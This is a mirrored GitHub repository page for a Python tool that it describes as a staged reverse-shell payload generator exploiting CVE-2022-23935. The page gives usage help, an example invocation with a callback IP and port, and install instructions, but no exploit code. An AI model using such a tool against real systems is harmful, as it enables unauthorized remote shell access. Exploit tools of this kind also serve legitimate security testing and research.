BKreisel / CVE-2022-23935

🐍 Python Exploit for CVE-2022-23935

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2022-23935

🐍 Python Exploit for CVE-2022-23935

Staged Reverse Shell Payload Generator for CVE-2022-23935

Example

cve-2022-23935 10.10.16.3 44444

Usage

usage: cve-2022-23935 [-h] [-l SERVER_PORT] [-s SHELL] ip port

positional arguments:
  ip                    IP Address/Host for Callback
  port                  Port Number for Callback

options:
  -h, --help            show this help message and exit
  -l SERVER_PORT, --listen SERVER_PORT
                        Port Number for Server Listen
  -s SHELL, --shell SHELL
                        Remote Shell

Installation

python3 -m pip install cve-2022-23935-1.0.0-py3-none-any.whl

Download Latest Release

Demo

demo

About

🐍 Python Exploit for CVE-2022-23935

License:MIT License


Languages

Language:Python 100.0%